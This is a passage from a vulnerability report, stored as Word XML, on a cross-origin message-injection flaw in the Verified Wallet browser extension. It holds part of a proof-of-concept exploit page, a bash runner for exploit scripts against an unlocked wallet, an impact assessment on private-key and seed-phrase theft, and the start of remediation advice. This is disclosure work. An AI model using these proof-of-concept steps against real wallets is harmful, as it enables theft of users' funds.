    <w:p w14:paraId="74F8645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}, 3000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782F22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3484C98" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47AF487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generateMessageId() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7B26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return Math.random().toString(36).substring(2, 11);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517F700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20F9C3B7" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28D6110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logSuccess(message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375839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addLog(message, "success");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA946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EF67CF3" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6124442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logError(message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475675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addLog(message, "error");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADD6BE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B821BBD" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="496F2E2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logInfo(message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494A57D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addLog(message, "info");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4418025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681E580F" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F2527D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logWarning(message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F764EA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addLog(message, "warning");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B3432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10238F07" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F32B6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addLog(message, type = "info") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177D93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logsDiv = document.getElementById("logs");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4789586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logEntry = document.createElement("div");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B122AC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logEntry.className = `log-entry ${type}`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03011F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logEntry.textContent = message;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D23D0F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logsDiv.insertBefore(logEntry, logsDiv.firstChild);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421479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2690EDA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// Keep only recent logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F942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entries = logsDiv.querySelectorAll(".log-entry");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158B7C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if (entries.length &gt; maxLogs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2344D04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entries[entries.length - 1].remove();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F77D3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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8AF0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234AC245" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="060B8DB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showBadge(status) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04474A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// Add status badge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFDB3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badgeDiv = document.createElement("div");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E2A30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badgeDiv.className = `status-badge status-${status.toLowerCase()}`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3996143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    badgeDiv.textContent = `[${status}]`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D91A04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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BE7CA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const container = document.querySelector(".container");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C15A6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container.insertBefore(badgeDiv, container.firstChild.nextSibling);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B6EB2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1C69068D" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="042D039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function clearLogs() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEFDD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document.getElementById("logs").innerHTML = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0603C91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responses.length = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A46E3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logInfo(`Logs cleared`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C93A0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6780B98" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7661BDB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// Initial log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB87D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logInfo(`Page: ${window.location.href}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C5F84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logInfo(`Waiting for wallet responses...`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D36DF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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312DE4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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4896CD6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&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5331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PoC 3: Automated Test Runner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E91703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test-runner.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8BFAE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bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1124431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#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372D6E91" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64F77B8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╔════════════════════════════════════════════════════════════════╗</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054AD57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 xml:space="preserve">   VERIFIED WALLET EXTENSION - VULNERABILITY TEST SUITE        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>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ED086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 xml:space="preserve">   Cross-Origin Message Injection Exploit PoC                  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>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6767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╚════════════════════════════════════════════════════════════════╝</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFF3EA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3A13DBFF" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26EB903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Colors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3607776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RED='\033[0;31m'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577B73F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GREEN='\033[0;32m'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361CBF9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YELLOW='\033[1;33m'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EFF80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BLUE='\033[0;34m'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0AE0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NC='\033[0m' </w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># No Color</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68419BA6" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37FD1C1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"${BLUE}[Step 1] Checking prerequisites...${NC}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042BE166" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2272B24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Check Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252D94A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! command -v node &amp;&gt; /dev/null; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AB81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-e "${RED}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Node.js not found${NC}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8AB79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"  Install Node.js 16+ from https://nodejs.org/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB1E3F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exit 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35823DF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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6090D7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"${GREEN}</w:t>
      </w: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Node.js installed: $(node --version)${NC}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA9D806" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21D1209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Check npm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDB31F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! command -v npm &amp;&gt; /dev/null; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A18C20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-e "${RED}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npm not found${NC}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D82C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exit 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A25BB4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248EAFE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"${GREEN}</w:t>
      </w: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npm installed: $(npm --version)${NC}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FFA064" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39B8E3E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050B40D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"${BLUE}[Step 2] Installing dependencies...${NC}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC3A6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npm install @verified-network/verified-custody --save &gt; /dev/null 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD030F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[ $? -eq 0 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF34E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-e "${GREEN}</w:t>
      </w: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SDK installed${NC}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D21A9A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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F75DCC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echo -e "${RED}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Failed to install SDK${NC}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A2D2B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"  Run: npm install @verified-network/verified-custody"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C79D6C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exit 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49322BA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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C23DFA" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AD0672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npm install --save-dev typescript ts-node @types/node &gt; /dev/null 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38121A0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[ $? -eq 0 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297CAC9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-e "${GREEN}</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✓</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> TypeScript tools installed${NC}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF541D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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EAD48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echo -e "${RED}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Failed to install TypeScript${NC}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E8249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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCFD398" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BF5776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22F2E7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"${BLUE}[Step 3] Running Node.js exploitation demo...${NC}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA67E6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"${YELLOW}</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C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━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>${NC}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4CC5EF" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25522D5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npx ts-node exploit-poc.ts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA2B321" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68BEE63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E935F3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"${YELLOW}</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>${NC}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B7BB01" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="018E1E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442B9E6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"${BLUE}[Step 4] Browser testing instructions...${NC}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586963E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5E2ABC4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"To test against the actual extension:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2886F44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5C56DA0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1. Install Verified Wallet v1.1.1 from Chrome Web Store"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF737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2. Create a test wallet account"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490F83F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echo "  3. Make sure the wallet is UNLOCKED"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734776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4. Open exploit.html in Chrome:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A4590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   file://$(pwd)/exploit.html"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F940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3352D2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5. Click any of the test buttons"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1349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30F5B7D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6. Check browser console (F12) for responses"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9A7EA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0AF8EA4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"${RED}Expected Result (VULNERABLE):${NC}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A40DF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Wallet responds with private key/signature"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D5359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NO user confirmation dialog appears"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F760EC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NO origin validation error"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F223DE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1FAE0E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"${GREEN}Expected Result (FIXED):${NC}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736A66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No response from wallet"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FC253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Origin validation error in console"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2D48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User confirmation required (if tested legitimately)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633167E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96C9CBA" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C57D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15F75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"${BLUE}[Step 5] Summary...${NC}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7637D0A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564C8F1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-e "${RED}</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> VULNERABILITY CONFIRMED${NC}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5219C8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422280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"The extension allows:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409D3AC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Private key export without consent"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE4059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Transaction signing without user interaction"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B70E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Complete fund theft"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B626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3400BEB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"Root cause:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA18A8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Missing origin validation in content.js"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4B8C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echo "  - Wildcard postMessage broadcasting"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304B548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  - No user confirmation for sensitive ops"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F5D17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572DFE8" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5304C1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""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78771C7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╔════════════════════════════════════════════════════════════════╗</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8B645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 xml:space="preserve">                    TEST SUITE COMPLETE                         </w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>║</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9400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echo "</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>╚════════════════════════════════════════════════════════════════╝</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADDFB0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1CD1B1F5">
          <v:rect id="_x0000_i1240" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F4D55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IMPACT ASSESSMENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA997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Direct Financial Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74134C9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This vulnerability enables complete wallet compromise leading to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236D47E5" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Private Key Theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326BE15A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Attacker gains permanent access to all funds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB10645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Can be imported into any wallet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754A7754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Provides no recovery mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D0D1DE" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unauthorized Transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A101156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Attacker can send funds to arbitrary addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7575C1FE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No confirmation dialog or user interaction required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A01E7E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Blockchain transactions are irreversible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BE8CEF" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Seed Phrase Extraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47317967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Complete account takeover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500B3052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Can generate infinite accounts from seed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584993B4" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Permanent loss of all assets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B4390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Attack Complexity vs. Impact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4827"/>
        <w:gridCol w:w="2032"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="22B81F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BD2D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Attack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235F3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C738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Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="0739CE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F0320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Very Easy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7A58A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Medium (Localized exploit)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65A79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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="6296C0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E03F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lastRenderedPageBreak/>
              <w:t>Easy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A7DCF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High (1,000+ users affected)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A943B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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="6E9BD5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F811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74808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Critical (100K+ users)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3597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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="6E51D5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4882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Complex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76895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Catastrophic (Platform-wide)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3C2B8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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="546DD7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Current vulnerability: Very Easy Attack → High-to-Critical Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EC7ED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Industry-Wide Risk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCA55A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text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2044717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Scenario: Verified Wallet has 10,000 active users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC2740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Average Holdings: $50K-$100K per user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE9B2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Total Assets at Risk: $500M-$1B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0279FAAA" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C91F99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If this vulnerability is exploited:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2721DC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- Even 10% of users compromised = $50M-$100M loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5908502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- Even 1% of users compromised = $5M-$10M loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF910D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- Regulatory fines &amp; liability = Additional $100M+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2408B67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- Reputation damage = Permanent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4BE3D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33A4C544">
          <v:rect id="_x0000_i1241" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="636FAFC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REMEDIATION &amp; FIXES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB8347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 1: Implement Proper Origin Validation (CRITICAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC0E59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scripts/content.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>Line: 22975</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0235769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CODE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5813BF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0897E5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window.addEventListener("message", async function handler(evnt) {</w:t>
      </w:r>
